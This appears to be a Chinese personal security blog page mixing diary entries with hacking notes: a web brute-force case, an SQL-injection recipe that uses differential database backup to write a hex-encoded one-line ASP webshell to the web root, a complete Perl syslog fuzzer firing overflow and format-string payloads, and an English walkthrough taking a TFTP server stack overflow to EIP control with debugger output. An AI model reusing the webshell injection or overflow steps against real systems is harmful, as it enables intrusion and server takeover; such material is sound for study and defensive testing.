You may say I am a dreamer,
But I am not the only one,
I hope someday you will join us,
And the world will live as one.
订阅数:149270感觉比较有趣的建筑,一直都是在海报里看到,P了一张,很难看,挂上来纪念一下:)
PS:猜猜我是在什么地方拍得:P
身体上,胃酸又犯了...经常想吐;工作上,最近的实验不太顺利,需要灵感,应该是还缺些什么,怪自己比较笨...;昨天,梦见两只形态完全不一样的凤凰,不知道这代表什么,有人能给我解解梦吗?:P
PS:最近的样子像生意失败的人似的,两天没刷牙和洗澡,胡子一个星期没刮--像俄国的大胡子,昏,照片就不放上来了--怕把大家都吓怕了,后天去客户培训--现在去刮刮胡子吧^@@^
修复了原有的一些BUG,加入脚本导入功能,也更兼容标准了(与NESSUS、X-SCAN书写方式兼容)。
带源代码,下载地址在:
无法否认,若技术不能放在社会生产当中的话,多么高的技术都是白费的,,,,,因此只有技术与市场挂钩才是王道。。。。
但现在的技术领域非常的浮躁、浮夸(不能排除我自己也在其中。。。),但其实我希望的不是这样,昨天与朋友们出来聊天时才发现了这点:我本来是希望朋友能大家真诚的对话,能集思广益达至讨论出一个方向的,但结果变成了“攀比”,回家后落笔写文档时却发现比未去聚会时思绪更乱,很明显,集思广益无法达到预期的效果同时更增添了一份惆怅。
后来总结了一下原因,除由于自己无法控制情绪外还需要保持一份对原始技术的探索思路--谦虚与“求同存异”的精神。是否因为时间的关系使我慢慢淡忘了这种“乞丐不停地向人乞讨”的‘低下精神’了呢?另外如果我更具备一种可以讨人喜欢的性格,那该多好呢?--世界会更加和谐。。。。。。OVER,上班去喏:)
中午匆匆找了个快餐店,吃了个手撕鸡饭,很难吃,居然还要30块。。。套餐,纳闷。。。
下午见到一台1.5G的家伙--趋势的垃圾邮件过滤系统:
x86,看看型号:
测试者告诉我一个字,至于是什么字,聪明的你一定想得到,,,,,我什么也没说过:P
WEB暴力破解--我用wvs fuzzer
Writer: demonalex[at]dark2s[dot]org
讲到WEB暴力破解通过大家都会用小榕的溯雪,但并不是所有WEB破解溯雪都是应付自如的(不要说我说小榕他老人家的坏话),最近因为工作的关系,碰到一个网管型设备的WEBPORTAL需要做WEB破解,看看HTML的源码:
…
<script language=javascript>
function login_send()
{
var f, p, page, url, option;
f = document.form_login.forced_in.value;
u = document.form_login.username.value;
p = document.form_login.passwd.value;
pg = document.form_login.page.value;
url = "atm_login?username="+u+"&passwd="+p+"&forced_in="+f+"&page="+pg;
option = "toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,favorites=no,resizable=no,left=230,width=520,top=120,height=300";
window.open(url, '_blank', option);
}
</script>
…
<form name='form_login' action='__Javascript:login_send();'>
<input type='hidden' name='forced_in' value='false'><input type='hidden' name=page value=''><input type='hidden' name='redirect_portal_ip' value=''>
<tr height=25%><td colspan='2'><img src='images/login-men.gif' width='177' height='22'></td>
<td width='27%' rowspan='4'><img src='images/l-hand.gif' width='148' height='141'></td></tr>
<tr height=25%><td width='28%' class='inputlabel'>Username:</td>
<td width='45%'><input name='username' type='text' value='' style='width:120px' class='inputbox'></td></tr>
<tr height=25%><td class='inputlabel'>Password:</td>
<td><input type='password' name='passwd' value='' style='width:120px' class='inputbox'></td></tr>
<tr height=25%><td> </td>
<td><input type=image src=images/login-go.gif width='71' height='22'></td></tr>
</from>
…
这里form的action是交给一个本地的javascript自定义函数-- login_send来完成的,用溯雪的话:
看来是因为调用了javascript的关系吧…
首先找到一个可以进行";"加一句SQL语句的SQL注入点,然后通过写入一句话马马并利用backup语句生成*.ASP(一句话的服务端),OK,LOG之。例子:
+++++++++++++++++++++++++++++++++++++++++++++++
差异备份的主要代码:
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。
+++++++++++++++++++++++++++++++++++++++++++++++
#!/usr/bin/perl
#syslog Fuzzer v0.1
#jaime.blasco@aitsec.com
#www.aitsec.com
use IO::Socket::INET;
use Getopt::Std;
use POSIX qw(strftime);
getopt('hp', \ my %opts );
$SIG{INT}=\&exitz;
print "
\t Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008
\t www.aitsec.com
";
if(!defined($opts{h}) or !defined($opts{p})){
print "
-h : Host\n
-p : Port
Number
";
exit
}
$port = $opts{p};
$host = $opts{h};
@bfo = ('A'x10, 'A'x20, 'A'x40, 'A'x80, 'A'x160,
'A'x320, 'A'x640, 'A'x1280, 'A'x3000, 'A'x5000,
'A'x8000, 'A'x12000, 'A'x15000);
@fse = ("%s%p%x%d", ".1024d", "%.2049d", "%p%p%p%p", "%x%x%x%x",
"%d%d%d%d", "%s%s%s%s", "%99999999999s",
"%08x", "%%20d", "%%20n",
"%%20x", "%%20s", "%s%s%s%s%s%s%s%s%s%s",
"%p%p%p%p%p%p%p%p%p%p",
"%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%",
"%s"x150, "%x"x300);
@int = ("-1", "0", "0x100", "0x1000", "0x3fffffff", "0x7ffffffe",
"0x7fffffff", "0x80000000", "0xfffffffe", "0xffffffff", "0x10000",
"0x100000");
print "Using host: ".$host."\n";
print "Using port: ".$port."\n";
$con=new IO::Socket::INET->new(PeerPort=>$port,
Proto=>'udp',
PeerAddr=>$host);
#http://www.ietf.org/rfc/rfc3164.txt
#udp SYSLOG PACKET looks like:
#<Priority>Header Message text
# Header = Date Hostname PID
$npriority = '<0>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008";
#fuzzing PRI
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = '<'.$_.'>'.$header.':
'.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = '<'.$_.'>'.$header.':
'.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = '<'.$_.'>'.$header.':
'.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing header
#fuzzing Date
#Buffer Overflow
foreach (@bfo) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $_.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing hostname
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$_.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing PID
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.' '.$_;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);
#print $packet;
}
sleep 1;
#fuzzing msg
#Buffer Overflow
foreach (@bfo) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
sleep 1;
#Format Strings
foreach (@fse) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
sleep 1;
#Integer Overflows
foreach (@int) {
$header = $ndate.' '.$nhostname.'
'.$npid;
$packet = $npriority.$header.': '.$_;
$con->send($packet);
#print $packet;
}
与朋友去给某些人洗脑时,朋友问起磁力,我觉得我只是描述磁力能力的“事实之全部”,朋友听完后却本着‘磁力实在是太有才了’的眼神看着我,是我的忽悠水平提高了呢?还是磁力已经到化境了(磁力看到这句一定几天都睡不着)。。。。无从得知,哈哈:D
几天前有幸面见行内一位极具权威的大牛,和他谈到了发展方向时我说出了我的理想,他告诉我,我的理想至少在5年内是无法实现的,我说,我可以等,就像盲人摸象(不过是个不同的版本),一个盲人只要不停地摸,终有一天可以摸到整只大象的外貌的。。。I believe
他还说,理想是会不断地变化的,这个我不否认,但我能说,从5年前到现在,我的理想都没有变过,我还相信,坚持就是胜利:)
Debug in ftpdwin0.4.2
writer: demonalex[at]dark2s[dot]org
I remember had seem some information about overflow ftpdwin(verion
0.4.2),perhaps memory ability was decline,so I wonder
to find which idea can tell me how to overflow that baby...Let's
show my tools:IDA,,,OLLYDB,,,WINDB,,,AND SO ON...
1)First,open IDA to create *.MAP and export.Take OllyDb attach
tftpd.exe,import MAP File to OllyDb, F9 for running...
2)Now we must find length of useless buffer,how??? Write one fuzz
script of perl named fuzzer.pl,content:
*********************************************************
#!/bin/perl -w
use Net::TFTP;
$|=1;
if(!defined($target_ip=shift)){
die("usage: $0 target_ip\n");
}
##################################
#expcode:
$buffer="\x41"x500; #length of useless
buffer
$expcode="$buffer";
##################################
$tftp = Net::TFTP->new("$target_ip", BlockSize => 1024);
$tftp->octet;
$tftp->get("$expcode");
exit 1;
*********************************************************
500 Bytes?Mistaken...EIP is not "\x41"x4...How about 400 Bytes?Of
course is not 400,too.But let us see the content
of stack:
00F5F174 00000000
00F5F178 00406437 返回到 tftpd.00406437 来自
<jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Ctrl+G calls goto site to 00406437 and F2 give it a breakpoint in
OllyDB.
3)Open WINDB to Attach tftpd.exe,brute force about eip equal to
0x41414141,the length is 288(includes RET).
4)Change expcode in fuzzer.pl:
##################################
#expcode:
$buffer="\x41"x284; #length of useless
buffer
$ret="\x44\x43\x42\x41";
$expcode="$buffer"."$ret";
##################################
5)In result,Ctrl+F2 into OllyDB for run tftpd.exe again,then play
our new fuzzer.pl,stop it at our breakpoint(00406437)
,see:
00406437 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; ||
0040643D |.
890424
mov [esp],
eax
; ||
00406440 |. E8 DB650100
call
<jmp.&msvcrt.strlen>
; |\strlen
00406445 |. 83F8 03
cmp eax,
3
; |
00406448 |. 76
16
jbe short
00406460
; |
0040644A |. C74424 04
5D6>mov dword ptr [esp+4],
0042655D ; |
00406452 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406458 |.
890424
mov [esp],
eax
; |
0040645B |. E8 70650100
call
<jmp.&msvcrt.strcat>
; \strcat
00406460 |> 8D85 E8FEFFFF
lea eax,
[ebp-118]
; |
00406466 |. 894424 04
mov [esp+4],
eax
; |
0040646A |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406470 |.
890424
mov [esp],
eax
; |
00406473 |. E8 58650100
call
<jmp.&msvcrt.strcat>
; \strcat
00406478 |> 8B45
10 mov
eax,
[ebp+10]
; |
0040647B |. 05 04010000
add eax,
104
; |
00406480 |. 894424 0C
mov [esp+C],
eax
; |
00406484 |. 8B45 10
mov eax,
[ebp+10]
; |
00406487 |. 894424 08
mov [esp+8],
eax
; |
0040648B |. C74424 04
040>mov dword ptr [esp+4],
104 ;
|
00406493 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406499 |.
890424
mov [esp],
eax
; |
0040649C |. E8 7F6C0100
call <jmp.&KERNEL32.GetFullPathNameA> ;
\GetFullPathNameA
004064A1 |. 83EC 10
sub esp, 10
004064A4 |.
85C0
test eax, eax
004064A6 |. 75
0C
jnz short 004064B4
004064A8 |. C785
D4FDFFFF>mov dword ptr [ebp-22C], 0
004064B2 |. EB
0A
jmp short 004064BE
004064B4 |> C785
D4FDFFFF>mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF
mov eax, [ebp-22C]
004064C4 |.
C9
leave
004064C5 \.
C3
retn
Press F8 from 00406437 to 004064C5,when come down at 004064C5,you
stop to find content of stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
hey hey ,u did it~
一直以来我思考的模式都是封闭两天思考,如果没有效果就放弃,选择其它思路。。。因为一旦超过两天,除要承受大了心理压力外,也会存在其它负担,感觉想碰到“不可能完成的任务”一样,而且自尊心与冲劲都会跌到了谷底,,,所以换种思考模式有时也未尝是件坏事。其实我个人觉得两天已经是个极限了,因为如果你这两天都想不到的话,估计最近都想不到,,,还是先找到了其它成功的办法(增加自信)再去考虑:)
新的思考模式可能会找其它已经成功的同类型案例,,,或是直接放弃该案例而采用其它有异曲同工之妙的方式(能达到客户认可的方式)。
不知道我的思考方式是不是有问题呢?:P
Powered by Haiwit